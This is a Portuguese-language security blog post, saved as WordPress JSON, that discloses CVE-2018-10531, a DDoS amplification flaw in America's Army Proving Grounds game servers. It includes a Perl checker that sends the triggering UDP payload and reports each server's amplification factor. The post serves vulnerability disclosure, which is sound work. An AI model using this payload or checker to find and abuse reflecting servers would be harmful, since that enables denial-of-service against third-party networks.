{"id":786,"date":"2018-05-29T19:13:57","date_gmt":"2018-05-29T22:13:57","guid":{"rendered":"https:\/\/www.xlabs.com.br\/blog\/?p=786"},"modified":"2021-08-25T18:30:20","modified_gmt":"2021-08-25T21:30:20","slug":"cve-2018-10531-americas-army-proving-grounds-ddos-amplification","status":"publish","type":"post","link":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/","title":{"rendered":"CVE-2018-10531 America&#8217;s Army Proving Grounds DDoS Amplification"},"content":{"rendered":"\n<p>Durante an\u00e1lises do fluxo de tr\u00e1fego de nossa CDN, muitas vezes nos deparamos com tr\u00e1fegos de UDP Flood, e atrav\u00e9s de um desses ataques que mitigamos surgiu a ideia de desenvolvermos uma palestra que demonstre a possibilidade de amplifica\u00e7\u00e3o de ataques DDoS com a utiliza\u00e7\u00e3o de Game Servers. Isso mesmo, servidores de jogos on-line hoje em dia se tornaram mais um vetor utilizado para a inunda\u00e7\u00e3o em redes para ocasionar a Nega\u00e7\u00e3o de Servi\u00e7os importantes para certas empresas.<\/p>\n\n\n\n<p>Os ataques de DDoS Amplification, normalmente utilizam m\u00e1quinas que respondem a &#8216;chamadas&#8217; de protocolos que n\u00e3o necessitam de uma autentica\u00e7\u00e3o da fonte de sua origem, com a utiliza\u00e7\u00e3o de outra t\u00e9cnica de ataque associada a esta t\u00e9cnica de amplifica\u00e7\u00e3o do ataque, conseguimos ent\u00e3o utilizar o protocolo UDP de forma maliciosa para ocasionar congestionamentos em link&#8217;s de Data-Center&#8217;s e redes de computadores.<\/p>\n\n\n\n<p>Em um de nossos experimentos internos, durante a elabora\u00e7\u00e3o da palestra que ser\u00e1 apresentada \u00e0 clientes e institui\u00e7\u00f5es de ensino, ao analisarmos o jogo <strong>America&#8217;s Army Proving Grounds<\/strong> desenvolvido pelo pr\u00f3prio Ex\u00e9rcito Americano (<strong>US Army<\/strong>), identificamos a presen\u00e7a da plataforma Unreal Engine, ao qual \u00e9 conhecida por ser uma das mais utilizadas no momento para desenvolvimento de jogos de tiro em primeira pessoa.<\/p>\n\n\n\n<p>Ap\u00f3s as a\u00e7\u00f5es de praxe de notifica\u00e7\u00e3o do Mitre.org, Nist.gov e demais institui\u00e7\u00f5es envolvidas na divulga\u00e7\u00e3o de falhas e no desenvolvimento da plataforma afetada pela vulnerabilidade, somente obtivemos a confirma\u00e7\u00e3o do Mitre.org e Nist.gov, ap\u00f3s algumas tentativas de contato com o Governo Americano atrav\u00e9s do DoD (Departamento de Defesa Americano), ao qual n\u00e3o obtivemos respostas satisfat\u00f3rias, resolvemos publicar esta vulnerabilidade, que al\u00e9m de Amplifica\u00e7\u00e3o de ataques DDoS, pode prender a comunica\u00e7\u00e3o dos servidores afetados em suas respectivas v\u00edtimas, ocasionando uma onda de dados desnecess\u00e1rios que pode ocasionar a nega\u00e7\u00e3o de servi\u00e7o em determinadas redes.<\/p>\n\n\n\n<p>Desenvolvemos um scanner para determinar quantos servidores estariam portando a vulnerabilidade e que estariam dispon\u00edveis no <a href=\"http:\/\/www.gametracker.com\">www.gametracker.com<\/a>, com o scanner podemos ter uma dimens\u00e3o do tamanho do problema que servidores com esta falha podem provocar caso tomem propor\u00e7\u00f5es maiores de utiliza\u00e7\u00e3o, assim como presenciamos o DDoS contra o GitHub que foi utilizado o Memcached para a distribui\u00e7\u00e3o e amplifica\u00e7\u00e3o dos ataques de nega\u00e7\u00e3o de servi\u00e7o. Segue print,<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2018\/05\/Sele\u00e7\u00e3o_484_2.png\"><img decoding=\"async\" width=\"989\" height=\"580\" src=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2018\/05\/Sele\u00e7\u00e3o_484_2.png\" alt=\"\" class=\"wp-image-795\"\/><\/a><\/figure>\n\n\n\n<p><strong>Exploit Checker<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted lang:perl decode:true\">#!\/usr\/bin\/perl\n\nuse IO::Socket::INET;\nuse IO::Socket::Timeout;\nuse strict;\nuse warnings;\nuse diagnostics;\n\n#\n# Date dd-mm-aaaa: 29-05-2018\n# Exploit for America's Army Proving Grounds \n# America's Army Proving Grounds DDoS Amplification Checker    \n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# Use with caution!\n# Use at your own risk!\n#\n\nmy $Line = $ARGV[0];\n\nif (@ARGV != 1){\n\n                        print \"\\n\";\n                        print \"XLabs Information Security www.xlabs.com.br\\n\";\n                        print \"America's Army Proving Grounds DDoS Amplification Checker\\n\";\n                        print \"Developed by Mauricio Correa\\n\";\n                        print \"Contact: mauricio\\@xlabs.com.br\\n\";\n                        print \"Usage: perl $0 192.168.1.1:7778\\n\";\n                        print \"\\n\";\n\n}else{\n\nprint \"\\n\";\nprint \"XLabs Information Security www.xlabs.com.br\\n\";\nprint \"America's Army Proving Grounds DDoS Amplification Checker\\n\";\nprint \"Developed by Mauricio Correa\\n\";\nprint \"Contact: mauricio\\@xlabs.com.br\\n\";\nprint \"Usage: perl $0 192.168.1.1:7778\\n\";\nprint \"\\n\";\n\nmy @ipinfo = split \/:\/, $Line;\nmy $ip = $ipinfo[0];\nmy $port = $ipinfo[1];\n\nprint \"Cheking IP: $ip Port:$port\\n\";\nmy $sock = new IO::Socket::INET(PeerAddr =&gt; $ip,\n                        PeerPort =&gt; $port,\n                        Proto =&gt; 'udp', Timeout =&gt; 1) or die('Error opening socket.');\nIO::Socket::Timeout-&gt;enable_timeouts_on($sock);\n\nmy $data = \"\\xff\\xff\\xff\\xff\\x00\";\n\n\n$sock-&gt;send($data) or die \"Error on send Payload...\\n\";\n\n$sock-&gt;read_timeout(2);\n\nmy $output = &lt;$sock&gt;;\n\nclose($sock);\n\n   if(length($output) == 0){\n\n        print \"[!] $ip:$port Not Vulnerable\\n\\n\";\n\n     }else{\n\n        my $amp_factor = length($output);\n        print \"[+] $ip:$port Vulnerable [Amplification Factor $amp_factor Bytes]\\n\\n\";\n\n     }\n\n}\n\n\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Durante an\u00e1lises do fluxo de tr\u00e1fego de nossa CDN, muitas vezes nos deparamos com tr\u00e1fegos de UDP Flood, e atrav\u00e9s de um desses ataques que mitigamos surgiu a ideia de desenvolvermos uma palestra que demonstre a possibilidade de amplifica\u00e7\u00e3o de ataques DDoS com a utiliza\u00e7\u00e3o de Game Servers. Isso mesmo, servidores de jogos on-line hoje [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1653,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[61],"tags":[172,173,152,171,175,174,177,176,99],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>CVE-2018-10531 America&#039;s Army Proving Grounds DDoS Amplification &ndash; XLabs Security Blog<\/title>\n<meta name=\"description\" content=\"Os ataques de DDoS Amplification, normalmente utilizam m\u00e1quinas que respondem a &#039;chamadas&#039; de protocolos que n\u00e3o necessitam de uma autentica\u00e7\u00e3o da fonte de sua origem.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2018-10531 America&#039;s Army Proving Grounds DDoS Amplification &ndash; XLabs Security Blog\" \/>\n<meta property=\"og:description\" content=\"Durante an\u00e1lises do fluxo de tr\u00e1fego de nossa CDN, muitas vezes nos deparamos com tr\u00e1fegos de UDP Flood, e atrav\u00e9s de um desses ataques que mitigamos surgiu a ideia de desenvolvermos uma palestra que demonstre a possibilidade de amplifica\u00e7\u00e3o de ataques DDoS com a utiliza\u00e7\u00e3o de Game Servers. Isso mesmo, servidores de jogos on-line hoje em dia se tornaram mais um vetor utilizado para a inunda\u00e7\u00e3o em redes para ocasionar a Nega\u00e7\u00e3o de Servi\u00e7os importantes para certas empresas.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/\" \/>\n<meta property=\"og:site_name\" content=\"XLabs Security Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/xlabs\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-29T22:13:57+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-25T21:30:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2018\/05\/americas-army-proving-grounds-ddos-amplification-blog-post-xlabs.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"488\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Mauricio Corr\u00eaa\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"CVE-2018-10531 America&#039;s Army Proving Grounds DDoS Amplification &ndash; XLabs Security Blog\" \/>\n<meta name=\"twitter:description\" content=\"Durante an\u00e1lises do fluxo de tr\u00e1fego de nossa CDN, muitas vezes nos deparamos com tr\u00e1fegos de UDP Flood, e atrav\u00e9s de um desses ataques que mitigamos surgiu a ideia de desenvolvermos uma palestra que demonstre a possibilidade de amplifica\u00e7\u00e3o de ataques DDoS com a utiliza\u00e7\u00e3o de Game Servers. Isso mesmo, servidores de jogos on-line hoje em dia se tornaram mais um vetor utilizado para a inunda\u00e7\u00e3o em redes para ocasionar a Nega\u00e7\u00e3o de Servi\u00e7os importantes para certas empresas.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2018\/05\/americas-army-proving-grounds-ddos-amplification-blog-post-xlabs.png\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mauricio Corr\u00eaa\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/\"},\"author\":{\"name\":\"Mauricio Corr\u00eaa\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\"},\"headline\":\"CVE-2018-10531 America&#8217;s Army Proving Grounds DDoS Amplification\",\"datePublished\":\"2018-05-29T22:13:57+00:00\",\"dateModified\":\"2021-08-25T21:30:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/\"},\"wordCount\":428,\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"keywords\":[\"America's Army\",\"America's Army Proving Grounds\",\"CDN\",\"CVE-2018-10531\",\"DDoS\",\"DDoS Amplification\",\"DDoS Protection\",\"Exploit-DB\",\"WAF\"],\"articleSection\":[\"Falhas de Seguran\u00e7a\"],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/\",\"name\":\"CVE-2018-10531 America's Army Proving Grounds DDoS Amplification &ndash; XLabs Security Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\"},\"datePublished\":\"2018-05-29T22:13:57+00:00\",\"dateModified\":\"2021-08-25T21:30:20+00:00\",\"description\":\"Os ataques de DDoS Amplification, normalmente utilizam m\u00e1quinas que respondem a 'chamadas' de protocolos que n\u00e3o necessitam de uma autentica\u00e7\u00e3o da fonte de sua origem.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/www.xlabs.com.br\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2018-10531 America&#8217;s Army Proving Grounds DDoS Amplification\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"name\":\"XLabs Security Blog\",\"description\":\"Seguran\u00e7a da Informa\u00e7\u00e3o\",\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\",\"name\":\"XLabs Security\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"contentUrl\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"width\":478,\"height\":168,\"caption\":\"XLabs Security\"},\"image\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.instagram.com\/xlabs.security\",\"https:\/\/www.linkedin.com\/company\/xlabs-security\/\",\"https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber\",\"https:\/\/www.facebook.com\/xlabs\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\",\"name\":\"Mauricio Corr\u00eaa\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"caption\":\"Mauricio Corr\u00eaa\"},\"url\":\"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2018-10531 America's Army Proving Grounds DDoS Amplification &ndash; XLabs Security Blog","description":"Os ataques de DDoS Amplification, normalmente utilizam m\u00e1quinas que respondem a 'chamadas' de protocolos que n\u00e3o necessitam de uma autentica\u00e7\u00e3o da fonte de sua origem.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/","og_locale":"pt_BR","og_type":"article","og_title":"CVE-2018-10531 America's Army Proving Grounds DDoS Amplification &ndash; XLabs Security Blog","og_description":"Durante an\u00e1lises do fluxo de tr\u00e1fego de nossa CDN, muitas vezes nos deparamos com tr\u00e1fegos de UDP Flood, e atrav\u00e9s de um desses ataques que mitigamos surgiu a ideia de desenvolvermos uma palestra que demonstre a possibilidade de amplifica\u00e7\u00e3o de ataques DDoS com a utiliza\u00e7\u00e3o de Game Servers. Isso mesmo, servidores de jogos on-line hoje em dia se tornaram mais um vetor utilizado para a inunda\u00e7\u00e3o em redes para ocasionar a Nega\u00e7\u00e3o de Servi\u00e7os importantes para certas empresas.","og_url":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/","og_site_name":"XLabs Security Blog","article_publisher":"https:\/\/www.facebook.com\/xlabs","article_published_time":"2018-05-29T22:13:57+00:00","article_modified_time":"2021-08-25T21:30:20+00:00","og_image":[{"width":1000,"height":488,"url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2018\/05\/americas-army-proving-grounds-ddos-amplification-blog-post-xlabs.png","type":"image\/png"}],"author":"Mauricio Corr\u00eaa","twitter_card":"summary_large_image","twitter_title":"CVE-2018-10531 America's Army Proving Grounds DDoS Amplification &ndash; XLabs Security Blog","twitter_description":"Durante an\u00e1lises do fluxo de tr\u00e1fego de nossa CDN, muitas vezes nos deparamos com tr\u00e1fegos de UDP Flood, e atrav\u00e9s de um desses ataques que mitigamos surgiu a ideia de desenvolvermos uma palestra que demonstre a possibilidade de amplifica\u00e7\u00e3o de ataques DDoS com a utiliza\u00e7\u00e3o de Game Servers. Isso mesmo, servidores de jogos on-line hoje em dia se tornaram mais um vetor utilizado para a inunda\u00e7\u00e3o em redes para ocasionar a Nega\u00e7\u00e3o de Servi\u00e7os importantes para certas empresas.","twitter_image":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2018\/05\/americas-army-proving-grounds-ddos-amplification-blog-post-xlabs.png","twitter_misc":{"Escrito por":"Mauricio Corr\u00eaa","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/#article","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/"},"author":{"name":"Mauricio Corr\u00eaa","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d"},"headline":"CVE-2018-10531 America&#8217;s Army Proving Grounds DDoS Amplification","datePublished":"2018-05-29T22:13:57+00:00","dateModified":"2021-08-25T21:30:20+00:00","mainEntityOfPage":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/"},"wordCount":428,"publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"keywords":["America's Army","America's Army Proving Grounds","CDN","CVE-2018-10531","DDoS","DDoS Amplification","DDoS Protection","Exploit-DB","WAF"],"articleSection":["Falhas de Seguran\u00e7a"],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/","url":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/","name":"CVE-2018-10531 America's Army Proving Grounds DDoS Amplification &ndash; XLabs Security Blog","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#website"},"datePublished":"2018-05-29T22:13:57+00:00","dateModified":"2021-08-25T21:30:20+00:00","description":"Os ataques de DDoS Amplification, normalmente utilizam m\u00e1quinas que respondem a 'chamadas' de protocolos que n\u00e3o necessitam de uma autentica\u00e7\u00e3o da fonte de sua origem.","breadcrumb":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2018-10531-americas-army-proving-grounds-ddos-amplification\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/www.xlabs.com.br\/blog\/"},{"@type":"ListItem","position":2,"name":"CVE-2018-10531 America&#8217;s Army Proving Grounds DDoS Amplification"}]},{"@type":"WebSite","@id":"https:\/\/www.xlabs.com.br\/blog\/#website","url":"https:\/\/www.xlabs.com.br\/blog\/","name":"XLabs Security Blog","description":"Seguran\u00e7a da Informa\u00e7\u00e3o","publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/www.xlabs.com.br\/blog\/#organization","name":"XLabs Security","url":"https:\/\/www.xlabs.com.br\/blog\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","contentUrl":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","width":478,"height":168,"caption":"XLabs Security"},"image":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.instagram.com\/xlabs.security","https:\/\/www.linkedin.com\/company\/xlabs-security\/","https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber","https:\/\/www.facebook.com\/xlabs"]},{"@type":"Person","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d","name":"Mauricio Corr\u00eaa","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","caption":"Mauricio Corr\u00eaa"},"url":"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/"}]}},"_links":{"self":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/786"}],"collection":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/comments?post=786"}],"version-history":[{"count":7,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/786\/revisions"}],"predecessor-version":[{"id":1654,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/786\/revisions\/1654"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media\/1653"}],"wp:attachment":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media?parent=786"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/categories?post=786"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/tags?post=786"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}